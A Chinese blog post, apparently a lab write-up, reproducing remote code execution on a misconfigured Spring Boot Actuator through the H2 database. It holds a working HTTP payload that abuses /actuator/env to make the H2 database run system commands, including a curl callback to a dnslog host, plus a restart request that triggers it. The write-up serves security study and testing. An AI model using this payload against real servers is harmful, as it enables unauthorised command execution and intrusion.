Spring Boot Actuator H2 RCE复现
0x01 前言
Spring Boot框架是最流行的基于Java的微服务框架之一,可帮助开发人员快速轻松地部署Java应用程序,加快开发过程。当Spring Boot Actuator配置不当可能造成多种RCE,因为Spring Boot 2.x默认使用HikariCP数据库连接池,所以可通过H2数据库实现RCE。
0x02 环境搭建
windows10 IP:192.168.233.1
centos7 IP:192.168.233.140
CentOS docker环境下载地址
git clone https://github.com/spaceraccoon/spring-boot-actuator-h2-rce.git
使用Docker搭建环境
从Dockerfile中创建镜像
docker build -t spaceraccoon/spring-boot-rce-lab .
启动docker中springboot镜像
docker run -p 8080:8080 -t spaceraccoon/spring-boot-rce-lab
本地访问虚拟机8080端口/actuator路径,docker环境搭建成功
http://192.168.233.140:8080/actuator
0x03 漏洞复现
1.提交POST请求,请求头内容为必须携带内容
POST /actuator/env HTTP/1.1
Host: 192.168.222.143:8080
Content-Type: application/json
Content-Length: 393
{"name":"spring.datasource.hikari.connection-test-query","value":"CREATE ALIAS EXEC AS 'String shellexec(String cmd) throws java.io.IOException { java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()); if (s.hasNext()) {return s.next();} throw new IllegalArgumentException();}'; CALL EXEC('curl 11od6s.dnslog.cn');"}
2.向端点 /actuator/restart 发送POST请求,重启应用
POST /actuator/restart HTTP/1.1
Host: 192.168.222.143:8080
Content-Type: application/json
Content-Length: 2
{}
3.dnslog.cn收到请求
0x04 结束语
细心的小伙伴肯定也看到了,我最后截图中的dnslog和测试时候的dnslog地址不一样,是因为在使用curl命令的时候测试失败了,可能是因为Linux中的原因,于是我把命令换成了ping -c xxx.dnslog.cn
,大家复现失败记得换一下命令哦
ping xxx.dnslog.cn
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 如何编写易于单元测试的代码
· 10年+ .NET Coder 心语,封装的思维:从隐藏、稳定开始理解其本质意义
· .NET Core 中如何实现缓存的预热?
· 从 HTTP 原因短语缺失研究 HTTP/2 和 HTTP/3 的设计差异
· AI与.NET技术实操系列:向量存储与相似性搜索在 .NET 中的实现
· 地球OL攻略 —— 某应届生求职总结
· 周边上新:园子的第一款马克杯温暖上架
· Open-Sora 2.0 重磅开源!
· 提示词工程——AI应用必不可少的技术
· .NET周刊【3月第1期 2025-03-02】